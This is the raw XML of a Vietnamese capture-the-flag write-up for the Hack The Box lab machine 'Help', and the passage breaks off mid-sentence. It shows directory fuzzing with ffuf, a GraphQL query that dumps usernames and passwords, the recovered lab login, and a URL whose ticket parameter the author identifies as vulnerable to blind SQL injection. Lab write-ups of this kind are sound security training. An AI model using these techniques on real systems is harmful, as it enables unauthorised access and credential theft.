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D9843" w14:textId="64CFDEE8" w:rsidR="000A1CD6" w:rsidRPr="000A1CD6" w:rsidRDefault="000A1CD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BCB94" w14:textId="05DCD896" w:rsidR="002F49FE" w:rsidRPr="00222BBC" w:rsidRDefault="000018B6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00222BBC">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D6A0892" wp14:editId="6E2CF880">
            <wp:extent cx="5943600" cy="3438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9FD5" w14:textId="26F16A06" w:rsidR="00222BBC" w:rsidRPr="00222BBC" w:rsidRDefault="00222BBC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526ACBB1" w14:textId="7BAB9449" w:rsidR="000A1CD6" w:rsidRPr="000A1CD6" w:rsidRDefault="000A1CD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0064AC8F" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRDefault="000A1CD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167D3224" w14:textId="15A768C3" w:rsidR="00222BBC" w:rsidRDefault="00EC135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hai máy chủ web đang hoạt động ở cổng 80 và 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F26E10" w14:textId="77777777" w:rsidR="008C2317" w:rsidRDefault="008C2317">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2566B93B" w14:textId="55810039" w:rsidR="00EC135B" w:rsidRDefault="009569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web ở cổng 80 là trang mặc định của máy chủ web apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253211A1" w14:textId="6501CFDC" w:rsidR="00956914" w:rsidRDefault="00956914">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119027AE" w14:textId="1B8A78B9" w:rsidR="00D8691E" w:rsidRDefault="00D8691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DF5BEE" wp14:editId="7B4184A4">
            <wp:extent cx="5905500" cy="101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0F79" w14:textId="77777777" w:rsidR="00D8691E" w:rsidRDefault="00D8691E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA38BF9" w14:textId="07970DF9" w:rsidR="007C140D" w:rsidRDefault="009569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quét tìm các thư mục bị ẩn</w:t>
      </w:r>
      <w:r w:rsidR="007C140D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FFC5D9" w14:textId="77777777" w:rsidR="00645561" w:rsidRDefault="00645561">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="528ACB95" w14:textId="3600A1D0" w:rsidR="00645561" w:rsidRPr="00D8691E" w:rsidRDefault="00645561">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8691E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffuf -w ./wordlists/directory-list-1.0.txt -u http://help.htb/FUZZ -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514C8134" w14:textId="7F059429" w:rsidR="00645561" w:rsidRDefault="00645561">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1411D4CB" w14:textId="1E1FA15F" w:rsidR="00645561" w:rsidRDefault="0064556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thư mục: /support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E8A96" w14:textId="17976480" w:rsidR="000E0471" w:rsidRDefault="000E0471">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F74B55" w14:textId="43104878" w:rsidR="000E0471" w:rsidRDefault="000E04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web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B90107" w14:textId="5A3356C7" w:rsidR="000E0471" w:rsidRDefault="000E047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94F093" wp14:editId="03B0A3B3">
            <wp:extent cx="4961626" cy="251624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19089" r="5088" b="13155"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4963041" cy="251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89084" w14:textId="77777777" w:rsidR="00645561" w:rsidRDefault="00645561">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702C3207" w14:textId="62540FA8" w:rsidR="00956914" w:rsidRDefault="009569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Công nghệ trang web sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6380F3DC" w14:textId="4493C27E" w:rsidR="00EC135B" w:rsidRDefault="0095691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ABF164" wp14:editId="35F6E2AB">
            <wp:extent cx="4820654" cy="5013789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32" cy="50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3DC7" w14:textId="58E3EB9C" w:rsidR="00834672" w:rsidRDefault="00834672">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD2A44D" w14:textId="7F08D1C4" w:rsidR="00834672" w:rsidRDefault="008346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Recon ở cấp độ 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10644D02" w14:textId="72EB027E" w:rsidR="00834672" w:rsidRDefault="00834672">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CCB8187" w14:textId="5D5515B9" w:rsidR="00834672" w:rsidRPr="00AD591E" w:rsidRDefault="00834672">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD591E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffuf -w ./wordlists/fuzz-Bo0oM.txt -u http://help.htb/support/FUZZ -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242F4788" w14:textId="44D7E068" w:rsidR="00834672" w:rsidRDefault="00834672">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C8D1DF" w14:textId="6C870394" w:rsidR="00834672" w:rsidRDefault="008346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tìm được tập tin rất quan trọng README.</w:t>
      </w:r>
      <w:r w:rsidR="00AD591E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6213887A" w14:textId="03D7AE83" w:rsidR="00F970BD" w:rsidRDefault="00AD591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43908D" wp14:editId="584FAE1F">
            <wp:extent cx="5943600" cy="3246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8380" w14:textId="531789E9" w:rsidR="00AD591E" w:rsidRDefault="00AD591E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49128344" w14:textId="0DA2D554" w:rsidR="00AD591E" w:rsidRDefault="006825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Phiên bản của helpdeskz là 1.0.2; PHP 5.x; cơ sở dữ liệu MySQL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADEC0A5" w14:textId="77777777" w:rsidR="00682521" w:rsidRDefault="00682521">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603B426F" w14:textId="2928C52D" w:rsidR="009D713C" w:rsidRDefault="009D71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Kiểm tra trên exploit-db trả về hai lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="009D713C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Arbitrary File Upload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="009D713C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Authenticated SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F09B1" w14:textId="4A237582" w:rsidR="00F970BD" w:rsidRDefault="00A71C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khai thác </w:t>
      </w:r>
      <w:r w:rsidRPr="00A71CAA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Arbitrary File Upload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhưng </w:t>
      </w:r>
      <w:r w:rsidR="00F970BD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>không được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074DAEA1" w14:textId="4A310372" w:rsidR="007A41D1" w:rsidRDefault="007A41D1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C46135A" w14:textId="6C6BD964" w:rsidR="00DC4F72" w:rsidRDefault="001672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Thế nên mình chuyển phạm vi tấn công sang trang web thứ 2 ở cổng 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41193307" w14:textId="007FBBBB" w:rsidR="000E0471" w:rsidRDefault="00025C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442E42" wp14:editId="0884DF01">
            <wp:extent cx="5943600" cy="1451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5B6" w14:textId="3A4F1A79" w:rsidR="00025CB8" w:rsidRDefault="00025CB8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC362E9" w14:textId="4582A968" w:rsidR="008C2317" w:rsidRDefault="00EA1C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Response header trả về cho bạn máy chủ web sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B96B68" w14:textId="40A9E661" w:rsidR="00A24859" w:rsidRDefault="00EA1CF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E52AE59" wp14:editId="27651C08">
            <wp:extent cx="2707240" cy="1151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51"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2707240" cy="11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7EAC8" w14:textId="51F6E8CD" w:rsidR="00EA1CF5" w:rsidRDefault="00EA1CF5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084DDAC4" w14:textId="3313B8CB" w:rsidR="00EA1CF5" w:rsidRDefault="00FA54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kiếm trên Google "Express js query language" nó sẽ trả về cho bạn khá nhiều kết quả về Graph QL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A51605" w14:textId="564A823A" w:rsidR="00FA547E" w:rsidRDefault="00FA547E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0372BEB2" w14:textId="0B8CD34B" w:rsidR="00FA547E" w:rsidRDefault="008D61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Chuyển hướng đến /graphql chúng ta gặp phải thông báo lỗi sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34929C71" w14:textId="5A067584" w:rsidR="008D61BA" w:rsidRDefault="008D61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66BE88" wp14:editId="39B11885">
            <wp:extent cx="5905500" cy="134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2291" w14:textId="15F4DD53" w:rsidR="008D61BA" w:rsidRDefault="008D61BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDB7637" w14:textId="71BBAB08" w:rsidR="008D61BA" w:rsidRDefault="003442C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Thử thêm chuỗi truy vấn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479D4F09" w14:textId="78EDF34B" w:rsidR="003442C4" w:rsidRDefault="003442C4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4633482A" w14:textId="1F9B4931" w:rsidR="00A24859" w:rsidRDefault="003442C4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003442C4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://help.htb:3000/graphql?query=abc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF790DB" w14:textId="2353967F" w:rsidR="008C2317" w:rsidRDefault="003442C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1BBD0F" wp14:editId="6A1E1868">
            <wp:extent cx="5943600" cy="2002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ABB" w14:textId="0CC2948C" w:rsidR="003442C4" w:rsidRDefault="003442C4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC985D2" w14:textId="78EC57DD" w:rsidR="003442C4" w:rsidRDefault="002165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Truy vấn GraphQL để tìm type và field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF3B8E4" w14:textId="20E5048C" w:rsidR="00216533" w:rsidRDefault="00216533">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CEC2AA8" w14:textId="0115B5F8" w:rsidR="00216533" w:rsidRDefault="002165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tìm được type User và 2 field username, password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C58B7F" w14:textId="6E5F45B0" w:rsidR="00390564" w:rsidRDefault="0021653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C5D8CD" wp14:editId="038DB4D7">
            <wp:extent cx="3044575" cy="5219272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436" cy="52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967C" w14:textId="417B0EB8" w:rsidR="00216533" w:rsidRDefault="00216533">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F071C0" w14:textId="1F6EC352" w:rsidR="00216533" w:rsidRDefault="00D60C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Trích xuất dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7747E485" w14:textId="1C16CA50" w:rsidR="00D60CA5" w:rsidRDefault="00D60CA5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8A83A7" w14:textId="56F4A069" w:rsidR="00390564" w:rsidRDefault="00D60CA5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60CA5">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/graphql?query={</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60CA5">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60CA5">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60CA5">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60CA5">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60CA5">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60CA5">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431841A5" w14:textId="767EE2F7" w:rsidR="000E0471" w:rsidRDefault="00D60CA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0CDA77" wp14:editId="4E726CAA">
            <wp:extent cx="4686300" cy="106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2559" w14:textId="3E63BED8" w:rsidR="00EC4118" w:rsidRDefault="00EC4118">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139D3385" w14:textId="154CC582" w:rsidR="00EC4118" w:rsidRDefault="00EC41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EDD059E" wp14:editId="72E6A4CA">
            <wp:extent cx="5943600" cy="1724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C3E6" w14:textId="3AD25951" w:rsidR="00EC4118" w:rsidRDefault="00EC4118">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B94168" w14:textId="761EA40D" w:rsidR="00EC4118" w:rsidRDefault="000A10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Đăng nhập trang web ở cổng 80: </w:t>
      </w:r>
      <w:r w:rsidRPr="000A10DC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>helpme@helpme.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidRPr="000A10DC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>godhelpmeplz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1088856E" w14:textId="0FE05663" w:rsidR="00424C83" w:rsidRDefault="00424C83">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5EE051" w14:textId="7D808799" w:rsidR="009B0D43" w:rsidRDefault="009B0D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Tạo 1 ticket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DEF616" w14:textId="4C7E53F3" w:rsidR="009B0D43" w:rsidRDefault="009B0D4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E6259C" wp14:editId="38B5CBD0">
            <wp:extent cx="5943600" cy="5128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63A0" w14:textId="0A65BC82" w:rsidR="00156B18" w:rsidRDefault="00156B18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFD705C" w14:textId="0EF766AD" w:rsidR="00156B18" w:rsidRDefault="00156B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Xem ticket mới tạo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442AC135" w14:textId="2ADBF5D9" w:rsidR="00156B18" w:rsidRDefault="00156B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4BB6E51" wp14:editId="198BFFAB">
            <wp:extent cx="4930416" cy="23524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0" t="19089" r="4923" b="17565"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4931845" cy="23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35E8C" w14:textId="3516FF96" w:rsidR="00156B18" w:rsidRDefault="00156B18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E57EBA4" w14:textId="19DC9A46" w:rsidR="00156B18" w:rsidRDefault="00AC7DC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Địa chỉ url của ticket abc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F172E38" w14:textId="7754FC6C" w:rsidR="00AC7DC4" w:rsidRDefault="00AC7DC4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1264B286" w14:textId="27A290B3" w:rsidR="00AC7DC4" w:rsidRDefault="00AC7DC4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC7DC4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://help.htb/support/?v=view_tickets&amp;action=ticket&amp;param[]=8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295DC33" w14:textId="6A2D5AB4" w:rsidR="00AC7DC4" w:rsidRDefault="00AC7DC4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FDA4D9" w14:textId="666B199C" w:rsidR="00AC7DC4" w:rsidRDefault="00EB1F9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76C7AF" wp14:editId="4A1D7054">
            <wp:extent cx="5208998" cy="2994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6" t="19362" r="3519"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5210440" cy="299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2605F" w14:textId="7CF7E929" w:rsidR="00EB1F93" w:rsidRDefault="00EB1F93">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB8C321" w14:textId="045A7110" w:rsidR="00EB1F93" w:rsidRDefault="00EB1F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bạn chọn tệp đính kèm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB01CA0" w14:textId="2B46E73D" w:rsidR="00EB1F93" w:rsidRDefault="00EB1F93">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A21E314" w14:textId="4D974306" w:rsidR="00EB1F93" w:rsidRDefault="00EB1F93">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB1F93">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://help.htb/support/?v=view_tickets&amp;action=ticket&amp;param[]=8&amp;param[]=attachment&amp;param[]=5&amp;param[]=10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF32482" w14:textId="10CC5536" w:rsidR="00EB1F93" w:rsidRDefault="00EB1F93">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09EDC51F" w14:textId="16675EBB" w:rsidR="00EB1F93" w:rsidRDefault="00EB1F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Tham số param cuối cùng bị dính lỗ hổng Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56022D22" w14:textId="2C8A5CE0" w:rsidR="00156B18" w:rsidRDefault="00156B18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5319C9F3" w14:textId="77777777" w:rsidR="00156B18" w:rsidRDefault="00156B18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3525D895" w14:textId="3EFE5DE4" w:rsidR="009B0D43" w:rsidRDefault="009B0D43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F64B923" w14:textId="77777777" w:rsidR="009B0D43" w:rsidRDefault="009B0D43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF91003" w14:textId="48251F81" w:rsidR="00424C83" w:rsidRDefault="00424C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CVE bị lỗi, nên mình khai thác bằng </w:t>
      </w:r>
      <w:r w:rsidR="00FA3651">
        <w:rPr>
